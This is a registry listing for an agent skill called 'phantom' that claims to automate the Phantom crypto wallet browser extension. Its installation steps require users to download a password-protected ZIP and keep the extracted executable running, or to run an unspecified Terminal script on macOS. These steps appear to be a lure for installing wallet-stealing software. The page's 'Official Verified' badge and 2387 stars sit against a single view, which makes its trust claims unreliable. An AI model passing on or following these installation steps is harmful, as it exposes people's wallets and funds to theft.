ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet tasks including token management, custom network setups, and balance checks using this OpenClaw AI skill for seamless blockchain navigation.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-qs450
Or

What This Skill Does

The Phantom skill provides OpenClaw agents with the capability to interface with and manage the Phantom browser extension, the premier multi-chain wallet for Solana, Ethereum, and Polygon ecosystems. This skill acts as a bridge between your automated agent and the browser-based wallet interface, allowing you to programmatically manage accounts, track token balances, configure custom RPC networks, and handle complex wallet interactions like transaction history retrieval and dApp connection management. By leveraging the openclaw-agent utility, this skill ensures that blockchain interactions are performed securely while maintaining full visibility into your asset management lifecycle across EVM and non-EVM chains.

Installation

To begin, ensure you have the Phantom browser extension installed on your preferred browser (Chrome, Firefox, or Brave). Critical for operational functionality, you must install the openclaw-agent. Windows users should download the official ZIP archive, extract it with the provided password, and keep the executable running. macOS users must follow the Terminal script installation provided in the official documentation. Once the agent bridge is active, you can install this skill directly into your OpenClaw environment using the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-qs450.

Use Cases

  • Asset Tracking: Automatically query and report token balances or transaction history for specific wallet addresses on the Solana mainnet.
  • Network Management: Dynamically add custom RPC providers or new EVM networks (like Arbitrum or Polygon) to your wallet configuration without manual settings entry.
  • Security Audits: Review and revoke permissions for connected dApps directly through the agent, ensuring that your wallet is not exposed to untrusted applications.
  • Troubleshooting: Diagnose stuck transactions by querying signature confirmations and verifying account status via CLI-based blockchain inspectors.

Example Prompts

  1. "Phantom, please add the Arbitrum One network configuration to my wallet settings so I can start interacting with dApps on that chain."
  2. "Check my current balance for the RAY and BONK tokens on Solana and provide a link to view my latest 5 transactions on Solscan."
  3. "List all my currently connected dApps and help me revoke access for any sites that haven't been active in the last 30 days."

Tips & Limitations

Always prioritize security by never sharing your recovery phrase. When using the CLI commands to interact with your wallet, ensure you are operating in a secure environment. Note that priority fee adjustments are manual; for high-frequency trading, always check the Transaction Settings to optimize for speed. If you encounter errors, ensure the openclaw-agent process is active in your background services. Remember that the skill interacts with a browser extension, so the browser must remain open and unlocked for the agent to communicate effectively.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-qs450": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#phantom#wallet#blockchain#solana#crypto
Safety Score: 3/5

Flags: network-access, file-read, code-execution